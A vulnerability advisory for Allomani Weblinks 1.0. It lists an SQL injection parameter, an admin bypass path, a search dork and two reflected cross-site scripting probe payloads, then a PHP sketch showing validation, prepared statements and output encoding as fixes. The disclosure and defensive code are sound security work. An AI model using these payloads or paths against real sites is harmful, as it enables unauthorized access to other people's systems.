Allomani Weblinks 1.0 Cross Site Scripting / SQL Injection

2014-10-05T00:00:00
ID PACKETSTORM:128565
Type packetstorm
Reporter indoushka
Modified 2014-10-05T00:00:00

Description

                                        
`Allomani Weblinks v1.0 Multiple Vulnerabilities  
=====================================  
Author : indoushka  
Vendor : http://www.allomani.com/  
Dork : جميع الحقوق محفوظة لـ : اللوماني © 2014  
برمجة اللوماني للخدمات البرمجية © 2006   
======================================  
  
Sql injection :  
  
http://127.0.0.1/public_html/index.php?action=browse&cat=1 (inject here)  
  
cpanel : http://127.0.0.1/public_html/admin.php  
  
Bypass :  
  
http://127.0.0.1/public_html/admin_menu.html  
  
Cross site scripting (verified) :  
  
Affected items  
/public_html/admin.php   
/public_html/go.php   
  
URI was set to "onmouseover='prompt(929220)'bad=">  
The input is reflected inside a tag parameter between double quotes.  
URL encoded GET input id was set to 12'"()&%<ScRiPt >prompt(983476)</ScRiPt>  
  
`
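
A defensive sketch for the two findings above, added here and not taken from Allomani's code: integer validation plus a bound query parameter for `cat`/`id`, and attribute-context encoding for reflected values. The `links` table, its columns and the function names are assumptions; the two test inputs are the strings quoted in the advisory.

```php
<?php
declare(strict_types=1);

// Added example, not Allomani Weblinks source. Table, column and function
// names are hypothetical; the schema is built in memory so this runs offline.

/** Accept only a positive decimal integer for parameters such as cat or id. */
function int_param($raw): ?int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

/** Encode a value for use inside a single- or double-quoted HTML attribute. */
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Look up links by category with a bound parameter, never concatenation. */
function links_in_category(PDO $db, int $cat): array
{
    $st = $db->prepare('SELECT id, title FROM links WHERE cat = :cat ORDER BY id');
    $st->bindValue(':cat', $cat, PDO::PARAM_INT);
    $st->execute();
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed in-memory data standing in for the application's database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE links (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT)');
$db->exec("INSERT INTO links (cat, title) VALUES (1, 'Example link')");

// Inputs: one legitimate value, then the two strings quoted in the advisory.
$idPayload  = "12'\"()&%<ScRiPt >prompt(983476)</ScRiPt>";
$uriPayload = "\"onmouseover='prompt(929220)'bad=\">";

foreach (['1', $idPayload] as $raw) {
    $cat = int_param($raw);
    if ($cat === null) {
        echo "rejected (400): ", attr($raw), "\n";
        continue;
    }
    echo "cat=$cat rows=", count(links_in_category($db, $cat)), "\n";
}
// Quotes and angle brackets are encoded, so the value stays inside the attribute.
echo '<form action="', attr($uriPayload), '">', "\n";
```

Validation and binding address the `cat` injection point; the encoding helper addresses the reflection "inside a tag parameter between double quotes" reported for `admin.php` and `go.php`.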